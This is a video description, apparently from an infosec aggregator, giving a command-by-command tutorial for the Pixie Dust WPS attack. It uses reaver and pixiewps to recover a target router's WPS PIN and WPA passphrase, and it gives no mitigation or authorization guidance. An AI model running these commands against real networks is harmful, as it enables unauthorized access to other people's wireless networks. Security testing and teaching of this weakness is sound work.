Description: This video will show you how to get started using PixieWPS
In summer of 2014, Dominique Bongard discovered what he called the "Pixie Dust" attack. This attack only works for the default WPS implementation of several wireless chip makers, Ralink, Realtek, and Broadcom. The attack focuses on a lack of randomization when generating the E-S1 and E-S2 "secret" nonces. If the attacker can figure out those two nonces, they can crack the pin within 1 second for some devices to about 30 minutes. A tool has been developed named pixiewps and a new version of Reaver has been developed in order to automate the process.
You will need the following stuff
Kali Linux: kali.org
Compatible Wireless Card: http://goo.gl/PfNJmD or http://goo.gl/wngqSc or http://goo.gl/xFD8lI
0:30 Command 1. apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
0:58 Command 2. git clone https://github.com/t6x/reaver-wps-fork-t6x.git
1:08 Command 3. cd reaver-wps-fork-t6x/src
1:19 Command 4. ./configure
1:29 Command 5. make
1:43 Command 6. make install
2:08 Command 7. airmon-ng
Finds what wireless cards are connected.
2:26 Command 8. airmon-ng start wlan0
Replace wlan0 with your wireless card might be wlan0 or wlan1 if more then one wireless card is connected.
2:51 Command 9. wash -i wlan0mon
Replace wlan0mon with which ever showed up under airmon-ng might be wlan0mon or wlan1mon if mon0 shows you got the wrong aircrack-ng installed.
3:14 Command 10. reaver
3:28 Command 11. reaver -i wlan0mon -b BSSIDHERE -c Channel#Here -vvv -K 1
Replace wlan0mon with whatever showed up under airmon-ng replace BSSID with your target BSSID replace Channel#Here with Wireless networks channel
-K 1 Command : Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom & Realtek)
- f Command : If -K1 Fails - f will Bruteforce the whole keyspace to get the WPS Pin.
4:24 PixieWPS gets the WPS Pin and WPA Wireless security passphrase of the target network.
Tags:
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.